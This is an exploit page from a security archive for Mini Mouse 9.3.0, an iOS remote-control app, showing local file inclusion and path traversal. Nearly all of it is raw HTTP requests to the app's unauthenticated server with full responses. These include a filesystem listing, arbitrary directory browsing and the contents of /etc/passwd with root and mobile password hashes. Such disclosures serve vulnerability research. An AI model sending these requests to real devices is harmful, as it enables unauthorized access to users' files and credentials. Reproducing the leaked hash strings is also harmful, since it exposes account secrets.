what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mini Mouse 9.3.0 Local File Inclusion / Path Traversal

Mini Mouse 9.3.0 Local File Inclusion / Path Traversal
Posted Apr 6, 2021
Authored by gosh

Mini Mouse version 9.3.0 suffers from local file inclusion and path traversal vulnerabilities.

tags | exploit, local, vulnerability, file inclusion
SHA-256 | a13bbc09d01e34368193013febfccedbf163b863c3649b83bc09aed75d823c8f

Mini Mouse 9.3.0 Local File Inclusion / Path Traversal

Change Mirror Download
# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
# Author: gosh
# Date: 05-04-2021
# Vendor Homepage: https://yodinfo.com
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
# Version: 9.3.0
# Tested on: iPhone; iOS 14.4.2

GET /op=get_device_info HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code": 1,
"ret_msg": "success",
"data": {
"uuid": "7E07125B-61BE-4F12-820C-FA706C445219",
"model": "iPhone",
"sys_name": "iOS",
"sys_version": "14.4.2",
"battery_state": 0,
"battery_level": -1,
"memery_total_size": 2983772160,
"device_name": "mobile",
"user_name": "iPhone",
"pwd": "",
"dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
"dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
"dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
"sys_type": 3
}
}



-------------------------------------------------------------------------------------


POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "//usr",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "usr",
"name_display": "usr",
"file_size": 288,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//bin",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "bin",
"name_display": "bin",
"file_size": 128,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//sbin",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "sbin",
"name_display": "sbin",
"file_size": 544,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.file",
"is_local": true,
"is_hide": true,
"is_floder": false,
"name": ".file",
"name_display": ".file",
"file_size": 0,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//etc",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "etc",
"name_display": "etc",
"file_size": 11,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//System",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "System",
"name_display": "System",
"file_size": 128,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//var",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "var",
"name_display": "var",
"file_size": 11,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//Library",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Library",
"name_display": "Library",
"file_size": 672,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//private",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "private",
"name_display": "private",
"file_size": 224,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//dev",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "dev",
"name_display": "dev",
"file_size": 1395,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.ba",
"is_local": true,
"is_hide": true,
"is_floder": true,
"name": ".ba",
"name_display": ".ba",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.mb",
"is_local": true,
"is_hide": true,
"is_floder": true,
"name": ".mb",
"name_display": ".mb",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//tmp",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "tmp",
"name_display": "tmp",
"file_size": 15,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//Applications",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Applications",
"name_display": "Applications",
"file_size": 3296,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//Developer",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Developer",
"name_display": "Developer",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//cores",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "cores",
"name_display": "cores",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}]
}
}

-------------------------
using the data found:
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download

POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 101

{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "GDT",
"name_display": "GDT",
"file_size": 96,
"create_time": 1617228.400302,
"update_time": 1617228.400302,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
"is_local": true,
"is_hide": false,
"is_floder": false,
"name": "input_photo.jpg",
"name_display": "input_photo.jpg",
"file_size": 6141491,
"create_time": 1617583.738397,
"update_time": 1617583.738402,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Ico",
"name_display": "Ico",
"file_size": 64,
"create_time": 1617583.334913,
"update_time": 1617583.334913,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Download",
"name_display": "Download",
"file_size": 64,
"create_time": 1617228.371587,
"update_time": 1617228.371587,
"sys_type": 3
}]
}
}

----------------------------------------------------------------------

GET /file=/etc/passwd HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 4

{}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/2018
Content-Length : 2018

##
# User Database
#
# This file is the authoritative user database.
##

nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close